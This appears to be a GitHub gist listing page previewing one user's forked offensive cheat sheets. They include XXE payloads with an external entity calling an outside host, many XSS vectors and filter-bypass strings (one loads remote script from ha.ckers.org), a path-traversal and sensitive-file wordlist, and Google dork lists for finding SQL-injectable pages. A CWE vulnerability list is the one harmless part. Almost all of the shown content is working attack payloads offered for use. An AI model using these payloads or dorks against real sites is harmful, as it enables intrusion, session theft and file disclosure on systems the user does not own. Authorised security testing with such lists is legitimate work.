saugatasil
/ XXE_payloads
Created
May 9, 2022 21:57
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
saugatasil
/ xss_vectors.txt
Created
May 9, 2022 21:57
— forked from kurobeats/xss_vectors.txt
XSS Vectors Cheat Sheet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %253Cscript%253Ealert('XSS')%253C%252Fscript%253E | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> |
saugatasil
/ vuln_list.txt
Created
September 16, 2020 07:26
— forked from Lopseg/vuln_list.txt
150 vulnerability types that you can submit for. Thanks to @thecybermentor and hackerone.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Account Hijacking | |
| Allocation of Resources Without Limits or Throttling - CWE-770 | |
| Array Index Underflow - CWE-129 | |
| Authentication Bypass Using an Alternate Path or Channel - CWE-288 | |
| Brute Force - CWE-307 | |
| Buffer Over-read - CWE-126 | |
| Buffer Underflow - CWE-124 | |
| Buffer Under-read - CWE-127 | |
| Business Logic Errors - CWE-840 | |
| Classic Buffer Overflow - CWE-120 |
saugatasil
/ dicc.txt
Created
September 16, 2020 07:26
— forked from Lopseg/dicc.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /secure/popups/UserPickerBrowser.jspa | |
| WEB-INF/context/db-context-standalone.xml | |
| !.gitignore | |
| !.htaccess | |
| !.htpasswd | |
| %20../ | |
| %2e%2e//google.com | |
| %3f/ | |
| %EXT% | |
| %ff/ |
saugatasil
/ google-dorks
Created
September 11, 2020 21:27
— forked from stevenswafford/google-dorks
Listing of a number of useful Google dorks.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| " _ _ " | |
| " _ /|| . . ||\ _ " | |
| " ( } \||D ' ' ' C||/ { % " | |
| " | /\__,=_[_] ' . . ' [_]_=,__/\ |" | |
| " |_\_ |----| |----| _/_|" | |
| " | |/ | | | | \| |" | |
| " | /_ | | | | _\ |" | |
| It is all fun and games until someone gets hacked! |
saugatasil
/ sql_dork_list
Created
September 11, 2020 21:26
— forked from mokiding/sql_dork_list
Google SQL dork list
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| trainers.php?id= | |
| play_old.php?id= | |
| declaration_more.php?decl_id= | |
| Pageid= | |
| games.php?id= | |
| newsDetail.php?id= | |
| staff_id= | |
| historialeer.php?num= | |
| product-item.php?id= | |
| news_view.php?id= |
saugatasil
/ xxsfilterbypass.lst
Created
September 4, 2020 09:25
— forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> |